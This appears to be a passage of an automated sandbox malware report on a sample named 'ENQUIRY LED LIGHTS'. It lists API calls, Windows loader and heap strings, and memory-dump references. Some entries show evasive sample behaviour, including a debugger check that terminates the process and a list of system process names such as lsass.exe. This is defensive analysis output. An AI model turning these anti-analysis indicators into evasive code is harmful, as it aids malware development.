                                                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                  APIs
                                                                                                  • DefWindowProcW.USER32(00002BD0,?,?,?,00001935,00002430), ref: 004016B7
                                                                                                  • DefWindowProcW.USER32(?,00000111,?,?,00000FBC,00002430), ref: 0040176C
                                                                                                  • DestroyWindow.USER32(?,00002430), ref: 004017A2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Window$Proc$Destroy
                                                                                                  • String ID: 0$$2?$?$a$~
                                                                                                  Strings
                                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02F854CE
                                                                                                  • 8, xrefs: 02F852E3
                                                                                                  • Thread identifier, xrefs: 02F8553A
                                                                                                  • Address of the debug info found in the active list., xrefs: 02F854AE, 02F854FA
                                                                                                  • double initialized or corrupted critical section, xrefs: 02F85508
                                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 02F85543
                                                                                                  • undeleted critical section in freed memory, xrefs: 02F8542B
                                                                                                  • Critical section address., xrefs: 02F85502
                                                                                                  • Invalid debug info address of this critical section, xrefs: 02F854B6
                                                                                                  • corrupted critical section, xrefs: 02F854C2
                                                                                                  • Critical section address, xrefs: 02F85425, 02F854BC, 02F85534
                                                                                                  • Critical section debug info address, xrefs: 02F8541F, 02F8552E
                                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02F854E2
                                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02F8540A, 02F85496, 02F85519
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                  Strings
                                                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 02F82602
                                                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 02F82506
                                                                                                  • @, xrefs: 02F8259B
                                                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 02F82412
                                                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 02F822E4
                                                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 02F8261F
                                                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 02F825EB
                                                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 02F82624
                                                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 02F82409
                                                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 02F824C0
                                                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 02F82498
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                  • API String ID: 0-4009184096
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                  • API String ID: 0-2515994595
                                                                                                  APIs
                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00446DCE
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00446DE3
                                                                                                  • UnhandledExceptionFilter.KERNEL32(0D), ref: 00446DEE
                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00446E0A
                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00446E11
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                  • String ID: 0D
                                                                                                  • API String ID: 2579439406-130544292
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                  • API String ID: 0-1700792311
                                                                                                  Strings
                                                                                                  • AVRF: -*- final list of providers -*- , xrefs: 02F98B8F
                                                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 02F98A3D
                                                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 02F98A67
                                                                                                  • VerifierDebug, xrefs: 02F98CA5
                                                                                                  • VerifierDlls, xrefs: 02F98CBD
                                                                                                  • HandleTraces, xrefs: 02F98C8F
                                                                                                  • VerifierFlags, xrefs: 02F98C50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                  • API String ID: 0-3223716464
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                  • API String ID: 0-1109411897
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-792281065
                                                                                                  Strings
                                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 02F69A2A
                                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 02F699ED
                                                                                                  • LdrpInitShimEngine, xrefs: 02F699F4, 02F69A07, 02F69A30
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 02F69A11, 02F69A3A
                                                                                                  • apphelp.dll, xrefs: 02F06496
                                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 02F69A01
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-204845295
                                                                                                  Strings
                                                                                                  • LdrpInitializeImportRedirection, xrefs: 02F88177, 02F881EB
                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 02F88181, 02F881F5
                                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 02F881E5
                                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 02F88170
                                                                                                  • LdrpInitializeProcess, xrefs: 02F4C6C4
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 02F4C6C3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                  • API String ID: 0-475462383
                                                                                                  Strings
                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 02F82178
                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 02F82165
                                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 02F8219F
                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 02F82180
                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 02F821BF
                                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 02F82160, 02F8219A, 02F821BA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                  • API String ID: 0-861424205
                                                                                                  APIs
                                                                                                  • CreateWindowExW.USER32(00000001,0044F898,0044F960,00CF0000,80000000,00000001,80000000,00000001,00000001,00000001,00001BFB,00000001), ref: 004013F5
                                                                                                  • ShowWindow.USER32(00000000,000062AF,00001BFB,?,75C0EBF0,?), ref: 0040146A
                                                                                                  • UpdateWindow.USER32(00000000), ref: 004014C8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Window$CreateShowUpdate
                                                                                                  • String ID: gfff
                                                                                                  • API String ID: 2944774295-1553575800
                                                                                                  APIs
                                                                                                    • Part of subcall function 02F52DF0: LdrInitializeThunk.NTDLL ref: 02F52DFA
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02F50BA3
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02F50BB6
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02F50D60
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02F50D74
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 1404860816-0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                  • API String ID: 0-379654539
                                                                                                  Strings
                                                                                                  • @, xrefs: 02F48591
                                                                                                  • LdrpInitializeProcess, xrefs: 02F48422
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 02F48421
                                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 02F4855E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-1918872054
                                                                                                  Strings
                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 02F821DE
                                                                                                  • .Local, xrefs: 02F428D8
                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 02F822B6
                                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 02F821D9, 02F822B1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                  • API String ID: 0-1239276146
                                                                                                  Strings
                                                                                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 02F83456
                                                                                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 02F8342A
                                                                                                  • RtlDeactivateActivationContext, xrefs: 02F83425, 02F83432, 02F83451
                                                                                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 02F83437
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                  • API String ID: 0-1245972979
                                                                                                  Strings
                                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 02F7106B
                                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 02F710AE
                                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 02F70FE5
                                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 02F71028
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                  • API String ID: 0-1468400865
                                                                                                  Strings
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 02F7A9A2
                                                                                                  • LdrpDynamicShimModule, xrefs: 02F7A998
                                                                                                  • apphelp.dll, xrefs: 02F32462
                                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 02F7A992
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-176724104
                                                                                                  Strings
                                                                                                  • HEAP[%wZ]: , xrefs: 02F23255
                                                                                                  • HEAP: , xrefs: 02F23264
                                                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 02F2327D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                  • API String ID: 0-617086771
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                  • API String ID: 0-4253913091
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $@
                                                                                                  • API String ID: 0-1077428164
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                                  • API String ID: 0-2779062949
                                                                                                  Strings
                                                                                                  • LdrpCheckModule, xrefs: 02F7A117
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 02F7A121
                                                                                                  • Failed to allocated memory for shimmed module list, xrefs: 02F7A10F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-161242083
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                  • API String ID: 0-1334570610
                                                                                                  Strings
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 02F882E8
                                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 02F882DE
                                                                                                  • Failed to reallocate the system dirs string !, xrefs: 02F882D7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                  Strings
                                                                                                  • PreferredUILanguages, xrefs: 02FCC212
                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 02FCC1C5
                                                                                                  • @, xrefs: 02FCC1F1
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                  Strings
                                                                                                  • LdrpCheckRedirection, xrefs: 02F9488F
                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 02F94899
                                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 02F94888
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                  Strings
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 02F92104
                                                                                                  • LdrpInitializationFailure, xrefs: 02F920FA
                                                                                                  • Process initialization failed with status 0x%08lx, xrefs: 02F920F3
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: #%u
                                                                                                  APIs
                                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 02F9CFBD
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: CallFilterFunc@8
                                                                                                  • String ID: @
                                                                                                  Strings
                                                                                                  • LdrResSearchResource Exit, xrefs: 02F1AA25
                                                                                                  • LdrResSearchResource Enter, xrefs: 02F1AA13
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: `$`
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: Legacy$UEFI
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$MUI
                                                                                                  Strings
                                                                                                  • kLsE, xrefs: 02F10540
                                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 02F1063D
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                  Strings
                                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 02F1A2FB
                                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 02F1A309
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                                  Strings
                                                                                                  Memory Dump Source
